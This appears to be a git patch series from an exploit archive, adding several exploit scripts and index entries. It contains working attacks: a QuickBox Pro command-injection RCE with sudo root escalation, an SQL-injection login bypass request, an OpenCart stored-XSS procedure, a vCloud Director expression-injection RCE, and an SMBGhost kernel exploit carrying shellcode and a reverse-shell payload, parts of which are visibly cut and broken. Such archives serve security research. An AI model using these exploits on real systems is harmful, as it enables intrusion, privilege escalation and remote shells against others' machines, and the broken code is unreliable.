"1", + "_wpnonce" : nonce, + "bbp-forums-role" : "bbp_keymaster" + }, allow_redirects=False, verify=False, timeout=10, headers=useragent) + except Exception as e: + print("[-] Error Making Signup Post Request: '{}'".format(e)) + return False + +if __name__ == "__main__": + exit("asdasd") + parser = argparse.ArgumentParser() + parser.add_argument("-n", "--username", dest="username", help="Username of Newly Created Keymaster", default="raphaelrocks") + parser.add_argument("-p", "--password", dest="password", help="Password of Newly Created Keymaster", default="raphael123") + parser.add_argument("-e", "--email", dest="email", help="Email of Newly Created Keymaster", default="test@example.com") + parser.add_argument("-u", "--url", dest="url", help="URL of Page With Exposed Register Page.", required=True) + args = parser.parse_args() + site_exploit = exploit(args.url, args.username, args.password, args.email) + if site_exploit and site_exploit.status_code == 302: + exit("[+] Exploit Successful, Use Username: '{}' and Password: '{}'".format(args.username, args.password)) + print("[-] Exploit Failed") \ No newline at end of file diff --git a/exploits/php/webapps/48536.py b/exploits/php/webapps/48536.py new file mode 100755 index 000000000..9570332e2 --- /dev/null +++ b/exploits/php/webapps/48536.py @@ -0,0 +1,53 @@ +# Exploit Title: QuickBox Pro 2.1.8 - Authenticated Remote Code Execution +# Date: 2020-05-26 +# Exploit Author: s1gh +# Vendor Homepage: https://quickbox.io/ +# Vulnerability Details: https://s1gh.sh/cve-2020-13448-quickbox-authenticated-rce/ +# Version: <= 2.1.8 +# Description: An authenticated low-privileged user can exploit a command injection vulnerability to get code-execution as www-data and escalate privileges to root due to weak sudo rules. +# Tested on: Debian 9 +# CVE: CVE-2020-13448 +# References: https://github.com/s1gh/QuickBox-Pro-2.1.8-Authenticated-RCE + +''' +Privilege escalation: After getting a reverse shell as the www-data user you can escalate to root in one of two ways. +1. sudo mysql -e '\! /bin/sh' +2. sudo mount -o bind /bin/sh /bin/mount;sudo mount + +''' + +#!/usr/bin/env python3 +# -*- coding: utf-8 -*- + +import requests +import argparse +import sys +from requests.packages.urllib3.exceptions import InsecureRequestWarning +from urllib.parse import quote_plus + +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +def exploit(args): + s = requests.Session() + print('[*] Sending our payload...') + + s.post('https://' + args.ip + '/inc/process.php', data={'username': args.username, 'password': args.password, 'form_submission': 'login'}, verify=False) + try: + s.get('https://' + args.ip + '/index.php?id=88&servicestart=a;' + quote_plus(args.cmd) + ';', verify=False) + except requests.exceptions.ReadTimeout: + pass + +def main(): + parser = argparse.ArgumentParser(description="Authenticated RCE for QuickBox Pro <= v2.1.8") + parser.add_argument('-i',dest='ip',required=True,help="Target IP Address") + parser.add_argument('-u',dest='username',required=True,help="Username") + parser.add_argument('-p',dest='password',required=True,help="Password") + parser.add_argument('-c',dest='cmd', required=True, help="Command to execute") + args = parser.parse_args() + + exploit(args) + + +if __name__ == '__main__': + main() + sys.exit(0) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index f0b4b6136..1d33ec6a1 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -42761,3 +42761,6 @@ id,file,description,date,author,type,platform,port 48531,exploits/php/webapps/48531.py,"QNAP QTS and Photo Station 6.0.3 - Remote Command Execution",2020-05-28,Th3GundY,webapps,php, 48532,exploits/php/webapps/48532.txt,"WordPress Plugin Multi-Scheduler 1.0.0 - Cross-Site Request Forgery (Delete User)",2020-05-29,UnD3sc0n0c1d0,webapps,php, 48533,exploits/multiple/webapps/48533.py,"Crystal Shard http-protection 0.2.0 - IP Spoofing Bypass",2020-05-29,"Halis Duraki",webapps,multiple, +48534,exploits/php/webapps/48534.py,"Wordpress Plugin BBPress 2.5 - Unauthenticated Privilege Escalation",2020-06-01,"Raphael Karger",webapps,php, +48535,exploits/multiple/webapps/48535.txt,"VMware vCenter Server 6.7 - Authentication Bypass",2020-06-01,Photubias,webapps,multiple, +48536,exploits/php/webapps/48536.py,"QuickBox Pro 2.1.8 - Authenticated Remote Code Execution",2020-06-01,s1gh,webapps,php, From 34b629388a0520e521a10b12a3b41940b1af527b Mon Sep 17 00:00:00 2001 From: Offensive Security Date: Wed, 3 Jun 2020 05:01:54 +0000 Subject: [PATCH 05/17] DB: 2020-06-03 3 changes to exploits/shellcodes Microsoft Windows - 'SMBGhost' Remote Code Execution Clinic Management System 1.0 - Authentication Bypass OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated) --- exploits/php/webapps/48538.txt | 42 +++ exploits/php/webapps/48539.txt | 15 + exploits/windows/remote/48537.py | 513 +++++++++++++++++++++++++++++++ files_exploits.csv | 3 + 4 files changed, 573 insertions(+) create mode 100644 exploits/php/webapps/48538.txt create mode 100644 exploits/php/webapps/48539.txt create mode 100755 exploits/windows/remote/48537.py diff --git a/exploits/php/webapps/48538.txt b/exploits/php/webapps/48538.txt new file mode 100644 index 000000000..174a13be9 --- /dev/null +++ b/exploits/php/webapps/48538.txt @@ -0,0 +1,42 @@ +# Exploit Title: Clinic Management System 1.0 - Authentication Bypass +# Google Dork: N/A +# Date: 2020-06-02 +# Exploit Author: BKpatron +# Vendor Homepage: https://www.sourcecodester.com/php/14243/open-source-clinic-management-system-php-full-source-code.html +# Software Link: https://www.sourcecodester.com/sites/default/files/download/Nikhil_B/clinic-full-source-code-with-database_0.zip +# Version: v1.0 +# Tested on: Win 10 +# CVE: N/A +# my website: bkpatron.com + +# Vulnerability: Attacker can bypass login page and access to dashboard page +# vulnerable file : login.php +# Parameter & Payload: '=''or' +# Proof of Concept: +http://localhost/source%20code/login.php + +POST /source%20code/login.php HTTP/1.1 +Host: localhost +User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-US,en;q=0.5 +Accept-Encoding: gzip, deflate +Content-Type: application/x-www-form-urlencoded +Content-Length: 72 +Referer: http://localhost/source%20code/login.php +Cookie: PHPSESSID=qdh5f7kelhhe9uvafveafit5e1 +Connection: keep-alive +Upgrade-Insecure-Requests: 1 +user=admin&email=%27%3D%27%27or%27&password=%27%3D%27%27or%27&btn_login=: undefined + +HTTP/1.1 200 OK +Date: Mon, 01 Jun 2020 19:52:17 GMT +Server: Apache/2.4.39 (Win64) PHP/7.2.18 +X-Powered-By: PHP/7.2.18 +Expires: Thu, 19 Nov 1981 08:52:00 GMT +Cache-Control: no-store, no-cache, must-revalidate +Pragma: no-cache +Content-Length: 4726 +Keep-Alive: timeout=5, max=100 +Connection: Keep-Alive +Content-Type: text/html; charset=UTF-8 \ No newline at end of file diff --git a/exploits/php/webapps/48539.txt b/exploits/php/webapps/48539.txt new file mode 100644 index 000000000..cf949f330 --- /dev/null +++ b/exploits/php/webapps/48539.txt @@ -0,0 +1,15 @@ +# Exploit Title: OpenCart 3.0.3.2 - Stored Cross Site Scripting (Authenticated) +# Date: 2020-06-01 +# Exploit Author: Kailash Bohara +# Vendor Homepage: https://www.opencart.com +# Software Link: https://www.opencart.com/index.php?route=cms/download +# Version: OpenCart < 3.0.3.2 +# CVE : CVE-2020-10596 + +1. Go to localhost.com/opencart/admin and login with credentials. + +2. Then navigate to System>Users>Users and click on Action button on top right corner. + +3. Now in image field , click on image and upload a new image. Before this select any image file and rename with this XSS payload "> and then upload it as new user profile image. + +4. After the upload completes the XSS pop-up executes as shown below and it will gets executed each time someone visits the Image manager section. \ No newline at end of file diff --git a/exploits/windows/remote/48537.py b/exploits/windows/remote/48537.py new file mode 100755 index 000000000..fae1d25e2 --- /dev/null +++ b/exploits/windows/remote/48537.py @@ -0,0 +1,513 @@ +#!/usr/bin/env python +''' +# EDB Note ~ Download: https://github.com/offensive-security/exploitdb-bin-sploits/raw/master/bin-sploits/48537.zip + +# SMBGhost_RCE_PoC + +RCE PoC for CVE-2020-0796 "SMBGhost" + +For demonstration purposes only! Only use this a reference. Seriously. This has not been tested outside of my lab environment. It was written quickly and needs some work to be more reliable. Sometimes you BSOD. Using this for any purpose other than self education is an extremely bad idea. Your computer will burst in flames. Puppies will die. + +Now that that's out of the way.... + +Usage ex: + +``` +$SMBGhost_RCE_PoC python exploit.py -ip 192.168.142.131 +[+] found low stub at phys addr 13000! +[+] PML4 at 1ad000 +[+] base of HAL heap at fffff79480000000 +[+] ntoskrnl entry at fffff80645792010 +[+] found PML4 self-ref entry 1eb +[+] found HalpInterruptController at fffff79480001478 +[+] found HalpApicRequestInterrupt at fffff80645cb3bb0 +[+] built shellcode! +[+] KUSER_SHARED_DATA PTE at fffff5fbc0000000 +[+] KUSER_SHARED_DATA PTE NX bit cleared! +[+] Wrote shellcode at fffff78000000a00! +[+] Press a key to execute shellcode! +[+] overwrote HalpInterruptController pointer, should have execution shortly... +``` + +Replace payload in USER_PAYLOAD in exploit.py. Max of 600 bytes. If you want more, modify the kernel shell code yourself. + +lznt1 code from [here](https://github.com/you0708/lznt1). Modified to add a "bad compression" function to corrupt SRVNET buffer +header without causing a crash. + +See this excellent write up by Ricera Security for more details on the methods I used: +https://ricercasecurity.blogspot.com/2020/04/ill-ask-your-body-smbghost-pre-auth-rce.html +''' + +import sys +import socket +import struct +import argparse + +from lznt1 import compress, compress_evil +from smb_win import smb_negotiate, smb_compress + +# Use lowstub jmp bytes to signature search +LOWSTUB_JMP = 0x1000600E9 +# Offset of PML4 pointer in lowstub +PML4_LOWSTUB_OFFSET = 0xA0 +# Offset of lowstub virtual address in lowstub +SELFVA_LOWSTUB_OFFSET = 0x78 +# Offset of NTOSKRNL entry address in lowstub +NTENTRY_LOWSTUB_OFFSET = 0x278 + +# Offset of hal!HalpApicRequestInterrupt pointer in hal!HalpInterruptController +HALP_APIC_REQ_INTERRUPT_OFFSET = 0x78 + +KUSER_SHARED_DATA = 0xFFFFF78000000000 + +# Offset of pNetRawBuffer in SRVNET_BUFFER_HDR +PNET_RAW_BUFF_OFFSET = 0x18 +# Offset of pMDL1 in SRVNET_BUFFER_HDR +PMDL1_OFFSET = 0x38 + +# Shellcode from kernel_shellcode.asm + +KERNEL_SHELLCODE = b"\x41\x50\x41\x51\x41\x55\x41\x57\x41\x56\x51\x52\x53\x56\x57\x4C" +KERNEL_SHELLCODE += b"\x8D\x35\xA0\x02\x00\x00\x49\x8B\x86\xD0\x00\x00\x00\x49\x8B\x9E" +KERNEL_SHELLCODE += b"\xD8\x00\x00\x00\x48\x89\x18\xFB\x49\x8B\x86\xE0\x00\x00\x00\x48" +KERNEL_SHELLCODE += b"\x2D\x00\x10\x00\x00\x66\x81\x38\x4D\x5A\x75\xF3\x49\x89\xC7\x4D" +KERNEL_SHELLCODE += b"\x89\xBE\xE0\x00\x00\x00\xBF\x78\x7C\xF4\xDB\xE8\xDA\x00\x00\x00" +KERNEL_SHELLCODE += b"\x49\x89\xC5\xBF\x3F\x5F\x64\x77\xE8\x2E\x01\x00\x00\x48\x89\xC1" +KERNEL_SHELLCODE += b"\xBF\xE1\x14\x01\x17\xE8\x21\x01\x00\x00\x48\x89\xC2\x48\x83\xC2" +KERNEL_SHELLCODE += b"\x08\x49\x8D\x74\x0D\x00\xE8\xFF\x00\x00\x00\x3D\xD8\x83\xE0\x3E" +KERNEL_SHELLCODE += b"\x74\x0A\x4D\x8B\x6C\x15\x00\x49\x29\xD5\xEB\xE5\xBF\x48\xB8\x18" +KERNEL_SHELLCODE += b"\xB8\x4C\x89\xE9\xE8\x91\x00\x00\x00\x49\x89\x06\x4D\x8B\x4D\x30" +KERNEL_SHELLCODE += b"\x4D\x8B\x45\x38\x49\x81\xE8\xF8\x02\x00\x00\x48\x31\xF6\x49\x81" +KERNEL_SHELLCODE += b"\xE9\xF8\x02\x00\x00\x41\x8B\x79\x74\x0F\xBA\xE7\x04\x73\x05\x4C" +KERNEL_SHELLCODE += b"\x89\xCE\xEB\x0C\x4D\x39\xC8\x4D\x8B\x89\xF8\x02\x00\x00\x75\xDE" +KERNEL_SHELLCODE += b"\x48\x85\xF6\x74\x40\x49\x8D\x4E\x08\x48\x89\xF2\x4D\x31\xC0\x4C" +KERNEL_SHELLCODE += b"\x8D\x0D\xB9\x00\x00\x00\x52\x41\x50\x41\x50\x41\x50\xBF\xC4\x5C" +KERNEL_SHELLCODE += b"\x19\x6D\x48\x83\xEC\x20\xE8\x2F\x00\x00\x00\x48\x83\xC4\x40\x49" +KERNEL_SHELLCODE += b"\x8D\x4E\x08\xBF\x34\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x19\x00\x00" +KERNEL_SHELLCODE += b"\x00\x48\x83\xC4\x20\xFA\x48\x89\xD8\x5F\x5E\x5B\x5A\x59\x41\x5E" +KERNEL_SHELLCODE += b"\x41\x5F\x41\x5D\x41\x59\x41\x58\xFF\xE0\xE8\x02\x00\x00\x00\xFF" +KERNEL_SHELLCODE += b"\xE0\x53\x51\x56\x41\x8B\x47\x3C\x4C\x01\xF8\x8B\x80\x88\x00\x00" +KERNEL_SHELLCODE += b"\x00\x4C\x01\xF8\x50\x8B\x48\x18\x8B\x58\x20\x4C\x01\xFB\xFF\xC9" +KERNEL_SHELLCODE += b"\x8B\x34\x8B\x4C\x01\xFE\xE8\x1F\x00\x00\x00\x39\xF8\x75\xEF\x58" +KERNEL_SHELLCODE += b"\x8B\x58\x24\x4C\x01\xFB\x66\x8B\x0C\x4B\x8B\x58\x1C\x4C\x01\xFB" +KERNEL_SHELLCODE += b"\x8B\x04\x8B\x4C\x01\xF8\x5E\x59\x5B\xC3\x52\x31\xC0\x99\xAC\xC1" +KERNEL_SHELLCODE += b"\xCA\x0D\x01\xC2\x85\xC0\x75\xF6\x92\x5A\xC3\xE8\xA1\xFF\xFF\xFF" +KERNEL_SHELLCODE += b"\x80\x78\x02\x80\x77\x05\x0F\xB6\x40\x03\xC3\x8B\x40\x03\xC3\x41" +KERNEL_SHELLCODE += b"\x57\x41\x56\x57\x56\x48\x8B\x05\x0A\x01\x00\x00\x48\x8B\x48\x18" +KERNEL_SHELLCODE += b"\x48\x8B\x49\x20\x48\x8B\x09\x66\x83\x79\x48\x18\x75\xF6\x48\x8B" +KERNEL_SHELLCODE += b"\x41\x50\x81\x78\x0C\x33\x00\x32\x00\x75\xE9\x4C\x8B\x79\x20\xBF" +KERNEL_SHELLCODE += b"\x5E\x51\x5E\x83\xE8\x58\xFF\xFF\xFF\x49\x89\xC6\x4C\x8B\x3D\xB3" +KERNEL_SHELLCODE += b"\x01\x00\x00\x31\xC0\x44\x0F\x22\xC0\x48\x8D\x15\x8E\x01\x00\x00" +KERNEL_SHELLCODE += b"\x89\xC1\x48\xF7\xD1\x49\x89\xC0\xB0\x40\x50\xC1\xE0\x06\x50\x49" +KERNEL_SHELLCODE += b"\x89\x01\x48\x83\xEC\x20\xBF\xEA\x99\x6E\x57\xE8\x1A\xFF\xFF\xFF" +KERNEL_SHELLCODE += b"\x48\x83\xC4\x30\x48\x8B\x3D\x63\x01\x00\x00\x48\x8D\x35\x77\x00" +KERNEL_SHELLCODE += b"\x00\x00\xB9\x1D\x00\x00\x00\xF3\xA4\x48\x8D\x35\x6E\x01\x00\x00" +KERNEL_SHELLCODE += b"\xB9\x58\x02\x00\x00\xF3\xA4\x48\x8D\x0D\xD8\x00\x00\x00\x65\x48" +KERNEL_SHELLCODE += b"\x8B\x14\x25\x88\x01\x00\x00\x4D\x31\xC0\x4C\x8D\x0D\x46\x00\x00" +KERNEL_SHELLCODE += b"\x00\x41\x50\x6A\x01\x48\x8B\x05\x22\x01\x00\x00\x50\x41\x50\x48" +KERNEL_SHELLCODE += b"\x83\xEC\x20\xBF\xC4\x5C\x19\x6D\xE8\xBD\xFE\xFF\xFF\x48\x83\xC4" +KERNEL_SHELLCODE += b"\x40\x48\x8D\x0D\x9E\x00\x00\x00\x4C\x89\xF2\x4D\x31\xC9\xBF\x34" +KERNEL_SHELLCODE += b"\x46\xCC\xAF\x48\x83\xEC\x20\xE8\x9E\xFE\xFF\xFF\x48\x83\xC4\x20" +KERNEL_SHELLCODE += b"\x5E\x5F\x41\x5E\x41\x5F\xC3\x90\xC3\x48\x92\x31\xC9\x51\x51\x49" +KERNEL_SHELLCODE += b"\x89\xC9\x4C\x8D\x05\x0D\x00\x00\x00\x89\xCA\x48\x83\xEC\x20\xFF" +KERNEL_SHELLCODE += b"\xD0\x48\x83\xC4\x30\xC3\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58" +KERNEL_SHELLCODE += b"\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x58\x00\x00" +KERNEL_SHELLCODE += b"\x00\x00\x00\x00\x00\x00" + +# Reverse shell generated by msfvenom. Can you believe I had to download Kali Linux for this shit? + +USER_PAYLOAD = b"" +USER_PAYLOAD += b"\xfc\x48\x83\xe4\xf0\xe8\xc0\x00\x00\x00\x41\x51\x41" +USER_PAYLOAD += b"\x50\x52\x51\x56\x48\x31\xd2\x65\x48\x8b\x52\x60\x48" +USER_PAYLOAD += b"\x8b\x52\x18\x48\x8b\x52\x20\x48\x8b\x72\x50\x48\x0f" +USER_PAYLOAD += b"\xb7\x4a\x4a\x4d\x31\xc9\x48\x31\xc0\xac\x3c\x61\x7c" +USER_PAYLOAD += b"\x02\x2c\x20\x41\xc1\xc9\x0d\x41\x01\xc1\xe2\xed\x52" +USER_PAYLOAD += b"\x41\x51\x48\x8b\x52\x20\x8b\x42\x3c\x48\x01\xd0\x8b" +USER_PAYLOAD += b"\x80\x88\x00\x00\x00\x48\x85\xc0\x74\x67\x48\x01\xd0" +USER_PAYLOAD += b"\x50\x8b\x48\x18\x44\x8b\x40\x20\x49\x01\xd0\xe3\x56" +USER_PAYLOAD += b"\x48\xff\xc9\x41\x8b\x34\x88\x48\x01\xd6\x4d\x31\xc9" +USER_PAYLOAD += b"\x48\x31\xc0\xac\x41\xc1\xc9\x0d\x41\x01\xc1\x38\xe0" +USER_PAYLOAD += b"\x75\xf1\x4c\x03\x4c\x24\x08\x45\x39\xd1\x75\xd8\x58" +USER_PAYLOAD += b"\x44\x8b\x40\x24\x49\x01\xd0\x66\x41\x8b\x0c\x48\x44" +USER_PAYLOAD += b"\x8b\x40\x1c\x49\x01\xd0\x41\x8b\x04\x88\x48\x01\xd0" +USER_PAYLOAD += b"\x41\x58\x41\x58\x5e\x59\x5a\x41\x58\x41\x59\x41\x5a" +USER_PAYLOAD += b"\x48\x83\xec\x20\x41\x52\xff\xe0\x58\x41\x59\x5a\x48" +USER_PAYLOAD += b"\x8b\x12\xe9\x57\xff\xff\xff\x5d\x49\xbe\x77\x73\x32" +USER_PAYLOAD += b"\x5f\x33\x32\x00\x00\x41\x56\x49\x89\xe6\x48\x81\xec" +USER_PAYLOAD += b"\xa0\x01\x00\x00\x49\x89\xe5\x49\xbc\x02\x00\x7a\x69" +USER_PAYLOAD += b"\xc0\xa8\x8e\x01\x41\x54\x49\x89\xe4\x4c\x89\xf1\x41" +USER_PAYLOAD += b"\xba\x4c\x77\x26\x07\xff\xd5\x4c\x89\xea\x68\x01\x01" +USER_PAYLOAD += b"\x00\x00\x59\x41\xba\x29\x80\x6b\x00\xff\xd5\x50\x50" +USER_PAYLOAD += b"\x4d\x31\xc9\x4d\x31\xc0\x48\xff\xc0\x48\x89\xc2\x48" +USER_PAYLOAD += b"\xff\xc0\x48\x89\xc1\x41\xba\xea\x0f\xdf\xe0\xff\xd5" +USER_PAYLOAD += b"\x48\x89\xc7\x6a\x10\x41\x58\x4c\x89\xe2\x48\x89\xf9" +USER_PAYLOAD += b"\x41\xba\x99\xa5\x74\x61\xff\xd5\x48\x81\xc4\x40\x02" +USER_PAYLOAD += b"\x00\x00\x49\xb8\x63\x6d\x64\x00\x00\x00\x00\x00\x41" +USER_PAYLOAD += b"\x50\x41\x50\x48\x89\xe2\x57\x57\x57\x4d\x31\xc0\x6a" +USER_PAYLOAD += b"\x0d\x59\x41\x50\xe2\xfc\x66\xc7\x44\x24\x54\x01\x01" +USER_PAYLOAD += b"\x48\x8d\x44\x24\x18\xc6\x00\x68\x48\x89\xe6\x56\x50" +USER_PAYLOAD += b"\x41\x50\x41\x50\x41\x50\x49\xff\xc0\x41\x50\x49\xff" +USER_PAYLOAD += b"\xc8\x4d\x89\xc1\x4c\x89\xc1\x41\xba\x79\xcc\x3f\x86" +USER_PAYLOAD += b"\xff\xd5\x48\x31\xd2\x48\xff\xca\x8b\x0e\x41\xba\x08" +USER_PAYLOAD += b"\x87\x1d\x60\xff\xd5\xbb\xf0\xb5\xa2\x56\x41\xba\xa6" +USER_PAYLOAD += b"\x95\xbd\x9d\xff\xd5\x48\x83\xc4\x28\x3c\x06\x7c\x0a" +USER_PAYLOAD += b"\x80\xfb\xe0\x75\x05\xbb\x47\x13\x72\x6f\x6a\x00\x59" +USER_PAYLOAD += b"\x41\x89\xda\xff\xd5" + + +PML4_SELFREF = 0 +PHAL_HEAP = 0 +PHALP_INTERRUPT = 0 +PHALP_APIC_INTERRUPT = 0 +PNT_ENTRY = 0 + +max_read_retry = 3 +overflow_val = 0x1100 +write_unit = 0xd0 +pmdl_va = KUSER_SHARED_DATA + 0x900 +pmdl_mapva = KUSER_SHARED_DATA + 0x800 +pshellcodeva = KUSER_SHARED_DATA + 0xa00 + + +class MDL: + def __init__(self, map_va, phys_addr): + self.next = struct.pack("> 12 + self.phys_addr1 = struct.pack("> (40 - 1))) + pdpt_index = (((1 << 9) - 1) & (va_addr >> (31 - 1))) + pdt_index = (((1 << 9) - 1) & (va_addr >> (22 - 1))) + pt_index = (((1 << 9) - 1) & (va_addr >> (13 - 1))) + + pml4e = PML4 + pml4_index*0x8 + pdpt_buff = read_physmem_primitive(ip, port, pml4e) + + if pdpt_buff is None: + sys.exit("[-] physical read primitive failed") + + pdpt = struct.unpack("> 9 + lb = (0xFFFF << 48) | (PML4_SELFREF << 39) + ub = ((0xFFFF << 48) | (PML4_SELFREF << 39) + + 0x8000000000 - 1) & 0xFFFFFFFFFFFFFFF8 + pt = pt | lb + pt = pt & ub + + return pt + + +def overwrite_pte(ip, port, addr): + phys_addr = get_phys_addr(ip, port, addr) + + buff = read_physmem_primitive(ip, port, phys_addr) + + if buff is None: + sys.exit("[-] read primitive failed!") + + pte_val = struct.unpack(" 3: + PHALP_INTERRUPT = index + i - 0x40 + print("[+] found HalpInterruptController at %lx" + % PHALP_INTERRUPT) + + if len(buff) < i + 0x40: + buff = read_physmem_primitive(ip, port, index + i + 0x38) + PHALP_APIC_INTERRUPT = struct.unpack("> 3 + + print("[+] found PML4 self-ref entry %0x" % PML4_SELFREF) + + +def find_low_stub(ip, port): + global PML4 + global PHAL_HEAP + global PNT_ENTRY + + limit = 0x100000 + index = 0x1000 + + while index < limit: + buff = read_physmem_primitive(ip, port, index) + + if buff is None: + sys.exit("[-] physical read primitive failed!") + + entry = struct.unpack(" Date: Thu, 4 Jun 2020 05:01:55 +0000 Subject: [PATCH 06/17] DB: 2020-06-04 1 changes to exploits/shellcodes vCloud Director 9.7.0.15498291 - Remote Code Execution --- exploits/linux/remote/48540.py | 139 +++++++++++++++++++++++++++++++++ files_exploits.csv | 1 + 2 files changed, 140 insertions(+) create mode 100755 exploits/linux/remote/48540.py diff --git a/exploits/linux/remote/48540.py b/exploits/linux/remote/48540.py new file mode 100755 index 000000000..ccf96e268 --- /dev/null +++ b/exploits/linux/remote/48540.py @@ -0,0 +1,139 @@ +#!/usr/bin/python +# Exploit Title: vCloud Director - Remote Code Execution +# Exploit Author: Tomas Melicher +# Technical Details: https://citadelo.com/en/blog/full-infrastructure-takeover-of-vmware-cloud-director-CVE-2020-3956/ +# Date: 2020-05-24 +# Vendor Homepage: https://www.vmware.com/ +# Software Link: https://www.vmware.com/products/cloud-director.html +# Tested On: vCloud Director 9.7.0.15498291 +# Vulnerability Description: +# VMware vCloud Director suffers from an Expression Injection Vulnerability allowing Remote Attackers to gain Remote Code Execution (RCE) via submitting malicious value as a SMTP host name. + +import argparse # pip install argparse +import base64, os, re, requests, sys +if sys.version_info >= (3, 0): + from urllib.parse import urlparse +else: + from urlparse import urlparse + +from requests.packages.urllib3.exceptions import InsecureRequestWarning +requests.packages.urllib3.disable_warnings(InsecureRequestWarning) + +PAYLOAD_TEMPLATE = "${''.getClass().forName('java.io.BufferedReader').getDeclaredConstructors()[1].newInstance(''.getClass().forName('java.io.InputStreamReader').getDeclaredConstructors()[3].newInstance(''.getClass().forName('java.lang.ProcessBuilder').getDeclaredConstructors()[0].newInstance(['bash','-c','echo COMMAND|base64 -di|bash|base64 -w 0']).start().getInputStream())).readLine()}" +session = requests.Session() + +def login(url, username, password, verbose): + target_url = '%s://%s%s'%(url.scheme, url.netloc, url.path) + res = session.get(target_url) + match = re.search(r'tenant:([^"]+)', res.content, re.IGNORECASE) + if match: + tenant = match.group(1) + else: + print('[!] can\'t find tenant identifier') + return (None,None,None,None) + + if verbose: + print('[*] tenant: %s'%(tenant)) + + match = re.search(r'security_check\?[^"]+', res.content, re.IGNORECASE) + if match: # Cloud Director 9.* + login_url = '%s://%s/login/%s'%(url.scheme, url.netloc, match.group(0)) + res = session.post(login_url, data={'username':username,'password':password}) + if res.status_code == 401: + print('[!] invalid credentials') + return (None,None,None,None) + else: # Cloud Director 10.* + match = re.search(r'/cloudapi/.*/sessions', res.content, re.IGNORECASE) + if match: + login_url = '%s://%s%s'%(url.scheme, url.netloc, match.group(0)) + headers = { + 'Authorization': 'Basic %s'%(base64.b64encode('%s@%s:%s'%(username,tenant,password))), + 'Accept': 'application/json;version=29.0', + 'Content-type': 'application/json;version=29.0' + } + res = session.post(login_url, headers=headers) + if res.status_code == 401: + print('[!] invalid credentials') + return (None,None,None,None) + else: + print('[!] url for login form was not found') + return (None,None,None,None) + + cookies = session.cookies.get_dict() + jwt = cookies['vcloud_jwt'] + session_id = cookies['vcloud_session_id'] + + if verbose: + print('[*] jwt token: %s'%(jwt)) + print('[*] session_id: %s'%(session_id)) + + res = session.get(target_url) + match = re.search(r'organization : \'([^\']+)', res.content, re.IGNORECASE) + if match is None: + print('[!] organization not found') + return (None,None,None,None) + organization = match.group(1) + if verbose: + print('[*] organization name: %s'%(organization)) + + match = re.search(r'orgId : \'([^\']+)', res.content) + if match is None: + print('[!] orgId not found') + return (None,None,None,None) + org_id = match.group(1) + if verbose: + print('[*] organization identifier: %s'%(org_id)) + + return (jwt,session_id,organization,org_id) + + +def exploit(url, username, password, command, verbose): + (jwt,session_id,organization,org_id) = login(url, username, password, verbose) + if jwt is None: + return + + headers = { + 'Accept': 'application/*+xml;version=29.0', + 'Authorization': 'Bearer %s'%jwt, + 'x-vcloud-authorization': session_id + } + admin_url = '%s://%s/api/admin/'%(url.scheme, url.netloc) + res = session.get(admin_url, headers=headers) + match = re.search(r'\s*([^<\s]+)', res.content, re.IGNORECASE) + if match: + version = match.group(1) + if verbose: + print('[*] detected version of Cloud Director: %s'%(version)) + else: + version = None + print('[!] can\'t find version of Cloud Director, assuming it is more than 10.0') + + email_settings_url = '%s://%s/api/admin/org/%s/settings/email'%(url.scheme, url.netloc, org_id) + + payload = PAYLOAD_TEMPLATE.replace('COMMAND', base64.b64encode('(%s) 2>&1'%command)) + data = 'false' + data += 'true' + data += 'true' + data += 'false%s25'%(payload) + data += '' + res = session.put(email_settings_url, data=data, headers=headers) + match = re.search(r'value:\s*\[([^\]]+)\]', res.content) + + if verbose: + print('') + try: + print(base64.b64decode(match.group(1))) + except Exception: + print(res.content) + + +parser = argparse.ArgumentParser(usage='%(prog)s -t target -u username -p password [-c command] [--check]') +parser.add_argument('-v', action='store_true') +parser.add_argument('-t', metavar='target', help='url to html5 client (http://example.com/tenant/my_company)', required=True) +parser.add_argument('-u', metavar='username', required=True) +parser.add_argument('-p', metavar='password', required=True) +parser.add_argument('-c', metavar='command', help='command to execute', default='id') +args = parser.parse_args() + +url = urlparse(args.t) +exploit(url, args.u, args.p, args.c, args.v) \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 8d97c1041..a73d057de 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18163,6 +18163,7 @@ id,file,description,date,author,type,platform,port 48513,exploits/windows/remote/48513.rb,"Plesk/myLittleAdmin - ViewState .NET Deserialization (Metasploit)",2020-05-25,Metasploit,remote,windows, 48514,exploits/hardware/remote/48514.rb,"Synology DiskStation Manager - smart.cgi Remote Command Execution (Metasploit)",2020-05-25,Metasploit,remote,hardware, 